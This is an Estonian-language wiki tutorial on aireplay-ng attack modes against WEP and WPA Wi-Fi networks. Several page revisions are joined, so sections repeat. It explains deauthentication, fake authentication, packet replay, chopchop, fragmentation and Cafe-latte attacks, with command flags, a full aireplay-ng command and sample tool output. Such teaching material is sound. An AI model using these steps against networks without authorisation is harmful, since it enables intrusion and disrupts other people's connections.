==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:52:23Z

Tliiv: /* IP */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:51:41Z

Tliiv: /* Viited */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

